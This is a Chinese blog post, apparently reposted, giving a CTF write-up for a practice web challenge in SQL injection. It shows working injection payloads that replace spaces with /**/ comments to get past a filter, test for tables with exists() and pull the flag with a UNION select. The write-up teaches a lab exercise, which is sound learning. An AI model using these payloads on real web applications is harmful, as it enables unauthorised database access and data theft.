实验吧CTF刷题记录(web篇四)
来源:互联网 发布:上海软件测试工资水平 编辑:程序博客网 时间:2024/05/18 03:05
1.简单的sql注入之2
有回显的mysql注入
格式:flag{}
解题链接: http://ctf5.shiyanbar.com/web/index_2.php
尝试输入单引号,出现错误
输入id=1' or ''=' 出现SQLi detected! 接着尝试输入or,没有出现SQLi detected字样,输入空格,出现SQLi detected。
可以发现此题对空格进行了限制。
试着用/**/代替空格。 输入id=1'/**/or/**/''='
ID: id=1'/**/or/**/''='name: baloteli
ID: id=1'/**/or/**/''='name: kanawaluo
ID: id=1'/**/or/**/''='name: dengdeng
可以看到sql语句成功执行了。接着输入 ?id='/**/or/**/exists(select/**/*/**/from/**/admin)/**/and/**/''=' 猜测表名
出现 Table 'web1.admin' doesn't exist
试一下flag ?id='/**/or/**/exists(select/**/*/**/from/**/flag)/**/and/**/''=' ID: ?id='/**/or/**/exists(select/**/*/**/from/**/flag)/**/and/**/''='name: baloteli
ID: ?id='/**/or/**/exists(select/**/*/**/from/**/flag)/**/and/**/''='name: kanawaluo
ID: ?id='/**/or/**/exists(select/**/*/**/from/**/flag)/**/and/**/''='name: dengdeng
查询成功,存在flag表
这里可以猜到有id 和name两个列
接下来使用union查找 ?id='/**/union/**/select/**/flag/**/from/**/flag/**/where/**/''='
得到flag值。
附上p神wp里的细节(这里ID很明显是自己所注入的语句,只有name才是当前表里面的数据,这里可以留个心眼。当前表估计只查找一列)
0 0
- 实验吧CTF刷题记录(web篇四)
- 实验吧CTF刷题记录(web篇)
- 实验吧CTF刷题记录(web篇二)
- 实验吧CTF刷题记录(web篇三)
- 牛客剑指offer刷题记录(四)
- 实验吧CTF-web
- LeetCode刷题记录Easy篇(1)
- CTF——实验吧(web总结1.1)
- 每周刷题记录(持续更新)
- 牛客剑指offer刷题记录(一)
- 牛客剑指offer刷题记录(二)
- 牛客剑指offer刷题记录(三)
- 牛客剑指offer刷题记录(五)
- 牛客剑指offer刷题记录(六)
- 牛客剑指offer刷题记录(七)
- OI刷题记录
- OI刷题记录~
- leetcode刷题记录
- 通过lazy-uiautomatorviewer来获得android元素的xpath
- BP算法——让你看清误差传播的每一步
- Java学习----day2——(3)数组(一维)
- vs2013 统一修改所有工程的目录配置(以 boost、opencv3. 的安装为例)
- jquery实现购物车非复选框总金额的变化
- 实验吧CTF刷题记录(web篇四)
- Android Material design 中的新控件使用
- javaWEB总结(33):检查用户是否登陆过滤器
- git命令详解进阶篇
- 推荐一本书:清华出版的《Modbus软件开发实战指南》
- Java Collection框架
- word如何打出取整符号
- Java面试系列
- Android UI